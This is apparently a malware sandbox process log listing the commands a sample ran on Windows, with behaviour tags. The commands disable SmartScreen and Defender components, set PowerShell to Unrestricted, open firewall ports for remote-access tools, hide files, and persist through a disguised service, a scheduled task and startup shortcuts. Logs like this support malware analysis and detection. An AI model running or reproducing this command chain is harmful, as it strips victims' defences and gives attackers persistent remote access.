C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f8⤵
- System Location Discovery: System Language Discovery
PID:1480
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f8⤵PID:1808
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f8⤵PID:1764
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f8⤵PID:2972
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f8⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f8⤵PID:2916
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f8⤵PID:2844
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f /reg:648⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f8⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f8⤵PID:288
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f /reg:648⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f8⤵PID:2296
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f /reg:648⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f8⤵
- System Location Discovery: System Language Discovery
PID:1456
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f /reg:648⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f /reg:648⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f8⤵PID:844
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable8⤵
- System Location Discovery: System Language Discovery
PID:1140
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable8⤵PID:2980
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable8⤵PID:2896
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable8⤵PID:2580
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable8⤵PID:2300
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\sc.exe config webthreatdefsvc start= disabled8⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\sc.exe config webthreatdefusersvc start= disabled8⤵
- Launches sc.exe
PID:2920
-
-
C:\Windows\SysWOW64\takeown.exeC:\Windows\System32\takeown.exe /s KHBTHJFA /u Admin /f "C:\Windows\System32\smartscreen.exe"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\SysWOW64\icacls.exeC:\Windows\System32\icacls.exe "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\taskkill.exeC:\Windows\System32\taskkill.exe /im smartscreen.exe /f8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\*.*"8⤵
- Views/modifies file attributes
PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:612
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Windows\note.exe"8⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵
- System Location Discovery: System Language Discovery
PID:964
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:1984
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:1020
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:1288
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:1440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:896
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:2244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:3052
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:3056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:2320
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:1528
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:3064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:556
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:792
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"8⤵
- Views/modifies file attributes
PID:1992
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_OK.ini"8⤵
- Views/modifies file attributes
PID:1536
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_ERRO.ini"8⤵
- Views/modifies file attributes
PID:968
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"8⤵
- Views/modifies file attributes
PID:592
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"8⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2460
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"8⤵
- Drops startup file
- Views/modifies file attributes
PID:2116
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.*"8⤵
- Views/modifies file attributes
PID:2568
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"8⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:2364
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"8⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:704
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"8⤵
- Views/modifies file attributes
PID:1640
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\Windows\SysWOW64\en\*.lst"8⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1932
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Windows\L2cache"8⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2080
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f8⤵
- System Location Discovery: System Language Discovery
PID:888
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:1040
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate8⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:1900
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate8⤵
- System Location Discovery: System Language Discovery
- Kills process with WMI
PID:3036
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:2336
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:2352
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:1588
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"8⤵
- Views/modifies file attributes
PID:2676
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.lst"8⤵
- Views/modifies file attributes
PID:2272
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe service where "name like 'Intel(R) Utiliti'" call stopservice8⤵PID:2456
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Intel(R) Utiliti'" Call Delete8⤵PID:2852
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe stop "Intel(R) Utiliti"8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:980
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\SC.exe DELETE "Intel(R) Utiliti"8⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Delete /TN * /F8⤵PID:2836
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:2904
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:2908
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:2476
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\Users\Public\shell.txt"8⤵
- Views/modifies file attributes
PID:2848
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\shell.txt"8⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ArgumentList 'Set-ExecutionPolicy Unrestricted' -Verb RunAs -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-ExecutionPolicy Unrestricted9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1692
-
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /f8⤵PID:2872
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f /reg:648⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f8⤵PID:2184
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 443" dir=in action=allow protocol=TCP localport=4438⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2648
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 443" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2040
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 80" dir=in action=allow protocol=TCP localport=808⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1252
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 80" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1704
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 6568" dir=in action=allow protocol=TCP localport=65688⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1380
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 6568" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2972
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 50001" dir=in action=allow protocol=TCP localport=500018⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1696
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 50001" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:824
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk1" dir=in action=allow program="C:\Program Files (x86)\AnyDesk\AnyDesk.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1684
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk2" dir=in action=allow program="C:\Program Files\AnyDesk\AnyDesk.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2980
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk3" dir=in action=allow program="C:\ProgramData\AnyDesk\AnyDesk.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1192
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer1" dir=in action=allow program="C:\Program Files (x86)\TeamViewer\TeamViewer.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3020
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer2" dir=in action=allow program="C:\Program Files\TeamViewer\TeamViewer.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2768
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer3" dir=in action=allow program="C:\ProgramData\TeamViewer\TeamViewer.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:676
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel1" dir=in action=allow program="C:\ProgramData\IntelSvc.exe" enable=yes8⤵
- Modifies Windows Firewall
- System Location Discovery: System Language Discovery
PID:1804
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel2" dir=in action=allow program="C:\Users\Public\IntelSvc.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1596
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel3" dir=in action=allow program="C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1936
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel4" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\tv_x86.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1796
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\USOShared\*.*"8⤵
- Views/modifies file attributes
PID:1340
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\ProgramData\IntelSvc.exe' -ArgumentList '-install_service' -verb runas -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1740 -
C:\ProgramData\IntelSvc.exe"C:\ProgramData\IntelSvc.exe" -install_service9⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2060
-
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 48⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f8⤵
- Sets service image path in registry
PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f /reg:648⤵
- Sets service image path in registry
- System Location Discovery: System Language Discovery
PID:2908
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"8⤵
- Views/modifies file attributes
PID:2868
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"8⤵
- Views/modifies file attributes
PID:2620
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /create /sc minute /mo 58 /tn "OneDrv" /tr "\"C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe\"" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:2764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"8⤵
- Loads dropped DLL
PID:2716
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"8⤵
- Drops startup file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1848
-
-
C:\Windows\SysWOW64\tasklist.exeC:\Windows\System32\tasklist.exe8⤵
- Enumerates processes with tasklist
PID:2648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "x86" 2>NUL"8⤵PID:868
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe /i "64"8⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe Query "HKLM\Hardware\Description\System\CentralProcessor\0"8⤵
- Checks processor information in registry
PID:1972
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe /i "x86"8⤵PID:1452
-
-
C:\Windows\SysWOW64\tasklist.exeC:\Windows\System32\tasklist.exe /FI "IMAGENAME eq Sophos.exe"8⤵
- Enumerates processes with tasklist
PID:2044
-
-
C:\Windows\SysWOW64\findstr.exeC:\Windows\System32\findstr.exe /i /c:"Sophos"8⤵PID:2004
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 28⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1252
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\Intxt1.ps1'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1'" -Encoding ascii}" -Wait8⤵
- Command and Scripting Interpreter: PowerShell
PID:1484
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
PID:2636
-
-
C:\Windows\SysWOW64\findstr.exeC:\Windows\System32\findstr.exe /i /b /v /c:"Name" /c:"----" "C:\Users\Admin\AppData\Local\Temp\Intxt1.txt"8⤵PID:2864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "Get-WmiObject" 2>NUL"8⤵
- System Location Discovery: System Language Discovery
PID:880
-
-
C:\Windows\SysWOW64\findstr.exeC:\Windows\System32\findstr.exe /i /c:"#"8⤵PID:1020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv8⤵PID:1524
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv9⤵PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c DIR /s "C:\Get-WmiObject*.exe" /B /O:D8⤵PID:3048
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio%'" Call Terminate8⤵
- Kills process with WMI
PID:912
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%Xmrig%'" Call Terminate8⤵
- Kills process with WMI
PID:1980
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:2080
-
-
